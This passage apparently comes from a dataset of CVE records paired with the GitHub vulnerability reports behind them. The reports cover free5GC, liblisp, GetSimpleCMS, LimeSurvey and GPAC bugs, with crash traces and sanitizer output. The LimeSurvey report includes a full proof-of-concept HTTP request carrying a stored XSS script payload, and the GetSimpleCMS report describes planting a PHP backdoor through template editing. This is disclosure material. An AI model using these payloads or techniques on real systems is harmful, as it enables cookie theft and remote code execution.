ppid=socket.htonl(60)) sk.close()` ## Expected behavior I have sent the registration request of a UE that has already completed registration, so the expected behavior should be a notification that the user is already registered and a rejection of the request.However, the AMF crashed ## Screenshots ![图片1](https://github.com/free5gc/free5gc/assets/135982481/8e6f6d0c-748c-49b8-b08f-2b82b9774dcf) ## Environment (please complete the following information): - free5GC Version: v3.3.0 - OS: Ubuntu 20.04.1 live-server - Kernel version: 5.4.0-165-generic ## Trace File ### Configuration File Use the default config file. ### PCAP File [crash.zip](https://github.com/free5gc/free5gc/files/13198058/crash.zip) ### Log File `amf | 2023-10-29T11:42:37.467203444Z [INFO][AMF][Ngap] [AMF] SCTP Accept from: <nil> amf | 2023-10-29T11:42:37.467906401Z [FATA][AMF][Ngap] panic: runtime error: invalid memory address or nil pointer dereference amf | goroutine 137 [running]: amf | runtime/debug.Stack() amf | /usr/local/go/src/runtime/debug/stack.go:24 +0x65 amf | github.com/free5gc/amf/internal/ngap/service.handleConnection.func1() amf | /go/src/free5gc/NFs/amf/internal/ngap/service/service.go:184 +0x58 amf | panic({0xbb3280, 0x13088a0}) amf | /usr/local/go/src/runtime/panic.go:1038 +0x215 amf | github.com/free5gc/amf/internal/ngap.Dispatch({0xdf2988, 0xc0001ec020}, {0xc0008ce000, 0x40000, 0x40000}) amf | /go/src/free5gc/NFs/amf/internal/ngap/dispatcher.go:19 +0xac amf | github.com/free5gc/amf/internal/ngap/service.handleConnection(0xc0001ec020, 0x40000, {0xd03d48, 0xd03d58, 0xd03d50}) amf | /go/src/free5gc/NFs/amf/internal/ngap/service/service.go:237 +0x417 amf | created by github.com/free5gc/amf/internal/ngap/service.listenAndServe amf | /go/src/free5gc/NFs/amf/internal/ngap/service/service.go:158 +0x9fe n3iwf | 2023-10-29T11:42:37.490422713Z [WARN][N3IWF][NGAP] [SCTP] Close connection. n3iwf | 2023-10-29T11:42:37.490494299Z [INFO][N3IWF][NGAP] NGAP receiver stopped n3iwf | 2023-10-29T11:42:37.490506087Z [INFO][N3IWF][NGAP] NGAP server stopped ueransim | [2023-10-29 11:42:37.490] [sctp] [debug] SCTP association shutdown (clientId: 2) ueransim | [2023-10-29 11:42:37.491] [sctp] [warning] Unhandled SCTP notification received ueransim | [2023-10-29 11:42:37.491] [ngap] [error] Association terminated for AMF[2] ueransim | [2023-10-29 11:42:37.491] [ngap] [debug] Removing AMF context[2] ` ## Additional context This security issue could allow anyone to send an message that would cause an amf denial of service and severely affect other users.
[Bugs]Amf crashed when failed to resolve the IP of ngap message , resulting in a null pointer reference.
https://api.github.com/repos/free5gc/free5gc/issues/501/comments
1
2023-10-29T12:48:07Z
2023-12-04T08:48:37Z
https://github.com/free5gc/free5gc/issues/501
1,966,977,323
501
5,755
CVE-2023-48024
2023-11-17T17:15:07.893
Liblisp through commit 4c65969 was discovered to contain a use-after-free vulnerability in void hash_destroy(hash_table_t *h) at hash.c
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/howerj/liblisp/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/howerj/liblisp/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:howerj:liblisp:*:*:*:*:*:*:*:*", "matchCriteriaId": "26CB9D0F-FF32-4225-84A4-B594E2F3ADEA", "versionEndExcluding": null, "versionEndIncluding": "2019-02-08", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/howerj/liblisp/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "howerj", "liblisp" ]
# Overview Hi there @howerj! I love the library and per usual I ran my fuzz tests in the background and found just a couple of memory corruption bugs in liblisp through 4c65969. I have included all of the files necessary for reproducing each bug. If I get some time I'll work on submitting a pull request. * Use-after-free in void hash_destroy(hash_table_t *h) at hash.c, lines 70-84. * Out-of-bounds read in unsigned get_length(lisp_cell_t * x) at eval.c, line 272. # Use-after-free There exist a use-after-free bug in void hash_destroy(hash_table_t *h) at hash.c, lines 70-84. I believe a potential fix for this would be to set the pointer 'hash_table_t *h' to null after passing it to 'free'. #### Source Code https://github.com/howerj/liblisp/blob/4c65969405d38cabb47e7b86eb19232073cdaf7d/src/hash.c#L70-L85 #### File for reproduction [uaf-liblisp.zip](https://github.com/howerj/liblisp/files/13270380/uaf-liblisp.zip) ### Address Sanitizer Output ``` ================================================================= ==134443==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000006a8 at pc 0x7f9da3ee019b bp 0x7ffce0e7abe0 sp 0x7ffce0e7abd8 READ of size 8 at 0x6080000006a8 thread T0 #0 0x7f9da3ee019a in hash_destroy src/hash.c:73 #1 0x7f9da3ee019a in hash_destroy src/hash.c:70 #2 0x7f9da3edf78f in gc_free src/gc.c:50 #3 0x7f9da3edf78f in lisp_gc_sweep_only src/gc.c:124 #4 0x7f9da3ee4011 in lisp_destroy src/lisp.c:80 #5 0x7f9da3ee871e in main_lisp_env src/repl.c:236 #6 0x7f9da36456c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #7 0x7f9da3645784 in __libc_start_main_impl ../csu/libc-start.c:360 #8 0x5615bae755b0 in _start (/home/kali/projects/fuzzing/liblisp/lisp+0x25b0) (BuildId: 0827e7ee54f24ed60d4875e0b6fa13ce80a7782b) 0x6080000006a8 is located 8 bytes inside of 96-byte region [0x6080000006a0,0x608000000700) freed by thread T0 here: #0 0x7f9da38d7298 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:52 #1 0x7f9da3ee750e in read_hash src/read.c:211 #2 0x7f9da3ee750e in reader src/read.c:279 previously allocated by thread T0 here: #0 0x7f9da38d7fa7 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:77 #1 0x7f9da3edfe97 in hash_create_custom src/hash.c:57 SUMMARY: AddressSanitizer: heap-use-after-free src/hash.c:73 in hash_destroy Shadow bytes around the buggy address: 0x608000000400: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 07 fa 0x608000000480: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 0x608000000500: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 07 fa 0x608000000580: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 07 fa 0x608000000600: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 07 fa =>0x608000000680: fa fa fa fa fd[fd]fd fd fd fd fd fd fd fd fd fd 0x608000000700: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa 0x608000000780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x608000000800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x608000000880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x608000000900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==134443==ABORTING ``` # Out-of-bounds Read There exist an out-of-bounds read in unsigned get_length(lisp_cell_t * x) at eval.c, line 272. The OOB read comes from the statement 'return (uintptr_t)(x->p[1].v);' when processing a malformed symbol. A potential fix for this would be to add check ensuring 'x->p[1].v' is within the bounds of the array. #### Source Code https://github.com/howerj/liblisp/blob/4c65969405d38cabb47e7b86eb19232073cdaf7d/src/eval.c#L271-L272 #### File for reproduction [oob-read-liblisp.zip](https://github.com/howerj/liblisp/files/13270382/oob-read-liblisp.zip) ### Address Sanitizer Output ``` ================================================================= ==134237==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f76159f9430 at pc 0x7f76159c98d4 bp 0x7ffe27551db0 sp 0x7ffe27551da8 READ of size 8 at 0x7f76159f9430 thread T0 #0 0x7f76159c98d3 in get_length src/eval.c:272 #1 0x7f76159c98d3 in get_length src/eval.c:264 #2 0x7f76159d6abf in subr_greater src/subr.c:325 #3 0x7f76159cbecc in eval src/eval.c:707 #4 0x7f76159d4c85 in lisp_repl src/repl.c:149 #5 0x7f76159d4fb8 in main_lisp_env src/repl.c:212 #6 0x7f76157f66c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #7 0x7f76157f6784 in __libc_start_main_impl ../csu/libc-start.c:360 #8 0x563c29c2b5b0 in _start (/home/kali/projects/fuzzing/liblisp/lisp+0x25b0) (BuildId: 0827e7ee54f24ed60d4875e0b6fa13ce80a7782b) 0x7f76159f9430 is located 48 bytes before global variable '_nil' defined in 'src/subr.c:137:1' (0x7f76159f9460) of size 16 0x7f76159f9430 is located 0 bytes after global variable '_tee' defined in 'src/subr.c:137:1' (0x7f76159f9420) of size 16 SUMMARY: AddressSanitizer: global-buffer-overflow src/eval.c:272 in get_length Shadow bytes around the buggy address: 0x7f76159f9180: f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 0x7f76159f9200: f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 0x7f76159f9280: f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 0x7f76159f9300: f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 0x7f76159f9380: f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 =>0x7f76159f9400: f9 f9 f9 f9 00 00[f9]f9 f9 f9 f9 f9 00 00 f9 f9 0x7f76159f9480: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x7f76159f9500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7f76159f9580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7f76159f9600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7f76159f9680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==134237==ABORTING ================================================================= ``` Thank you! @Halcy0nic
Memory Corruption Bugs in Liblisp through commit 4c65969
https://api.github.com/repos/howerj/liblisp/issues/1/comments
1
2023-11-06T17:11:22Z
2023-11-14T19:21:28Z
https://github.com/howerj/liblisp/issues/1
1,979,643,796
1
5,756
CVE-2023-6188
2023-11-17T18:15:07.150
A vulnerability was found in GetSimpleCMS 3.3.16/3.4.0a. It has been rated as critical. This issue affects some unknown processing of the file /admin/theme-edit.php. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-245735.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "MULTIPLE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1352" }, { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1358" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.245735" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.245735" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1352" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1358" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.245735" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.245735" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:get-simple:getsimplecms:3.3.16:*:*:*:*:*:*:*", "matchCriteriaId": "C4E0FD65-B030-462F-86BA-6CB5EDC80FE8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:get-simple:getsimplecms:3.4.0a:*:*:*:*:*:*:*", "matchCriteriaId": "BCE85121-C55E-4280-88D8-F0B53CBDCA75", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1358
[ "Exploit" ]
github.com
[ "GetSimpleCMS", "GetSimpleCMS" ]
There is a remote code execution vulnerability in GetSimpleCMS 3.4.0a version, the specific location is GetSimpleCMS/admin/theme-edit.php Although this version fixes the problem raised by #1352, if you directly modify the template file, you also can write the PHP backdoor. For example ![Screenshot 2023-11-09 at 15 46 41](https://github.com/GetSimpleCMS/GetSimpleCMS/assets/19178256/8007b48c-0566-4c6e-bf78-9f753107d9fb) You can modify this file directly Then the modified template file GetSimpleCMS/theme/Innovation/template.php will be included in the GetSimpleCMS/index.php file through the include operation. <img width="595" alt="Screenshot 2023-11-09 at 15 58 10" src="https://github.com/GetSimpleCMS/GetSimpleCMS/assets/19178256/43c152bf-543b-4175-bdbe-b47b52b72c6e"> Example of executing ls command ![Screenshot 2023-11-09 at 15 52 37](https://github.com/GetSimpleCMS/GetSimpleCMS/assets/19178256/64c5ef54-8695-4c94-b54c-2b070a27756b)
Remote command executioin vulnerability in 3.4.0a
https://api.github.com/repos/GetSimpleCMS/GetSimpleCMS/issues/1358/comments
0
2023-11-09T08:08:10Z
2024-04-19T02:36:20Z
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1358
1,985,053,712
1,358
5,757
CVE-2023-44796
2023-11-18T00:15:07.133
Cross Site Scripting (XSS) vulnerability in LimeSurvey before version 6.2.9-230925 allows a remote attacker to escalate privileges via a crafted script to the _generaloptions_panel.php component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/Hebing123/CVE-2023-44796/issues/1" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/Hebing123/cve/issues/4" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/LimeSurvey/LimeSurvey/pull/3483" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/limesurvey/limesurvey/commit/135511073c51c332613dd7fad9a8ca0aad34a3fe" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/Hebing123/CVE-2023-44796/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/Hebing123/cve/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/LimeSurvey/LimeSurvey/pull/3483" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/limesurvey/limesurvey/commit/135511073c51c332613dd7fad9a8ca0aad34a3fe" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:*", "matchCriteriaId": "05741E6D-3E8F-43BE-9EF7-4C535AAD6C3B", "versionEndExcluding": "6.2.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Hebing123/cve/issues/4
null
github.com
[ "Hebing123", "cve" ]
**LimeSurvey 6.2.9-230925 has a storage based XSS vulnerability caused by importManifest in [limesurvey/limesurvey](https://huntr.com/repos/limesurvey/limesurvey)** ### **Description** A regular user with "theme" privileges who maliciously sets the "templatename" during the importManifest process can lead to a stored Cross-Site Scripting (XSS) vulnerability. ### **Proof of Concept** The first step is to create a user with only 'theme' permission. Log in to this user and make a request to/index.php/themeOptions/importManifest. Payload: `"><script>alert(1)</script>//` ### **Request:** ``` POST /index.php/themeOptions/importManifest HTTP/1.1 Host: 192.168.160.130 Content-Length: 362 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.160.130 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ5Fx3ILX1P8Y4aCx User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.160.130/index.php/themeOptions/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: [] Connection: close ------WebKitFormBoundaryQ5Fx3ILX1P8Y4aCx Content-Disposition: form-data; name="YII_CSRF_TOKEN" cEVmTmlNRXlqNVFBSl9qYnVGUmtjd2VZUHJtQ0F1UG5pEjQOU-SeXW7To0RH9_rPINh_thglgRaA23WdYDqjUA== ------WebKitFormBoundaryQ5Fx3ILX1P8Y4aCx Content-Disposition: form-data; name="templatename" 123"><script>alert(1)</script>// ------WebKitFormBoundaryQ5Fx3ILX1P8Y4aCx-- ``` When administrators or other users access http://192.168.160.130/index.php/themeOptions When, it will be subjected to storage based XSS attacks. ### **Impact** Attackers can import a templatename containing a payload to execute JavaScript code and hijack the administrator’s cookie. [tiborpacalat](https://huntr.com/users/tiborpacalat/) marked this as fixed in 6.2.9+230925 with commit [135511](https://www.github.com/limesurvey/limesurvey/commit/135511073c51c332613dd7fad9a8ca0aad34a3fe) 2 months ago
LimeSurvey 6.2.9-230925 has a storage based XSS vulnerability caused by importManifest in limesurvey/limesurvey
https://api.github.com/repos/Hebing123/cve/issues/4/comments
1
2023-12-14T03:31:28Z
2024-03-11T06:23:47Z
https://github.com/Hebing123/cve/issues/4
2,040,839,627
4
5,758
CVE-2023-48039
2023-11-20T15:15:09.820
GPAC 2.3-DEV-rev617-g671976fcc-master is vulnerable to memory leak in gf_mpd_parse_string media_tools/mpd.c:75.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2679" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2679" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev617-g671976fcc-master:*:*:*:*:*:*:*", "matchCriteriaId": "F540C691-D615-4A9B-8DD6-69B8488E3BA1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/gpac/gpac/issues/2679
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "gpac", "gpac" ]
1.Version ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev617-g671976fcc-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io/ Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D 2.ASAN [DASH] Updated manifest: P#1: start 0 - duration 0 - xlink none [DASH] Manifest after update: P#1: start 0 - duration 0 - xlink none [DASH] Setting up period start 0 duration 0 xlink none ID DID1 [DASH] AS#1 changed quality to bitrate 10 kbps - Width 1280 Height 720 FPS 30/1 (playback speed 1) [DASH] AS#2 changed quality to bitrate 120 kbps - Width 384 Height 256 FPS 30/1 (playback speed 1) [DASH] No ROUTE entity on HTTP request [DASH] Segment duration unknown - cannot estimate current startNumber [DASH] Cannot try to download (null)... out of memory ? [DASH] AS#3 changed quality to bitrate 120 kbps - Width 448 Height 256 FPS 30/1 (playback speed 1) [DASH] AS#4 changed quality to bitrate 120 kbps - Width 448 Height 256 FPS 30/1 (playback speed 1) [DASH] AS#5 changed quality to bitrate 120 kbps - Width 384 Height 256 FPS 30/1 (playback speed 1) [DASH] Adaptation 16: non-video in a video group - disabling it [DASH] AS#6 changed quality to bitrate 31 kbps (playback speed 1) [DASH] AS#6 changed quality to bitrate 120 kbps - Width 448 Height 256 FPS 30/1 (playback speed 1) [DASH] AS#7 changed quality to bitrate 120 kbps - Width 448 Height 256 FPS 30/1 (playback speed 1) [DASH] AS#8 changed quality to bitrate 120 kbps - Width 384 Height 208 FPS 30/1 (playback speed 1) [DASH] AS#9 changed quality to bitrate 120 kbps - Width 448 Height 208 FPS 30/1 (playback speed 1) [DASH] AS#10 changed quality to bitrate 120 kbps - Width 448 Height 208 FPS 30/1 (playback speed 1) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78047975763 ms: Initializing Timeline: startNumber=1 segmentNumber=78047975 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.8048e+07) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78047975763 ms: Initializing Timeline: startNumber=1 segmentNumber=78047975 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.8048e+07) [DASH] No ROUTE entity on HTTP request [DASH] Segment duration unknown - cannot estimate current startNumber [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78047975763 ms: Initializing Timeline: startNumber=1 segmentNumber=78047975 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.8048e+07) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78047975763 ms: Initializing Timeline: startNumber=1 segmentNumber=78047975 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.8048e+07) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78047975763 ms: Initializing Timeline: startNumber=1 segmentNumber=78047975 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.8048e+07) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78047975763 ms: Initializing Timeline: startNumber=1 segmentNumber=78047975 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.8048e+07) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78047975763 ms: Initializing Timeline: startNumber=1 segmentNumber=78047975 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.8048e+07) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78047975763 ms: Initializing Timeline: startNumber=1 segmentNumber=78047975 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.8048e+07) [DASH] No ROUTE entity on HTTP request [DASH] AST at init 1621274304781 [DASH] At current time 78047975763 ms: Initializing Timeline: startNumber=1 segmentNumber=78047975 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.8048e+07) [DASHDmx] group 0 error locating plugin for segment - mime type video/mp4 name crashes/live_dash_track1_init.mp4: Requested URL is not valid or cannot be found Filters not connected: fout (dst=id_000070,sig_06,src_000600,time_26661155,execs_144902,op_havoc,rep_1_dash.mpd:gpac:segdur=10000/1000:profile=full:!sap:buf=1500:!check_dur:pssh=v:subs_sidx=0) (idx=1) Arg segdur set but not used Arg profile set but not used Arg !sap set but not used Arg buf set but not used Arg !check_dur set but not used Arg pssh set but not used Arg subs_sidx set but not used ================================================================= ==2943152==ERROR: LeakSanitizer: detected memory leaks Direct leak of 20 byte(s) in 2 object(s) allocated from: #0 0x7fb5f41339a7 in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cpp:454 #1 0x7fb5f2fd4bbc in gf_mpd_parse_string media_tools/mpd.c:75 #2 0x7fb5f2fd4bbc in gf_mpd_parse_common_representation_attr media_tools/mpd.c:665 SUMMARY: AddressSanitizer: 20 byte(s) leaked in 2 allocation(s). 3.Reproduction ./MP4Box -dash 10000 $poc 4.POC file [crash.zip](https://github.com/gpac/gpac/files/13274821/crash.zip) 5.Impact Malicious files that are opened may cause a crash 6.Credit LOVERJIE
memory leaks in gf_mpd_parse_string media_tools/mpd.c:75
https://api.github.com/repos/gpac/gpac/issues/2679/comments
0
2023-11-07T02:35:25Z
2023-12-04T10:07:49Z
https://github.com/gpac/gpac/issues/2679
1,980,426,267
2,679
5,759
CVE-2023-48090
2023-11-20T15:15:09.863
GPAC 2.3-DEV-rev617-g671976fcc-master is vulnerable to memory leaks in extract_attributes media_tools/m3u8.c:329.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
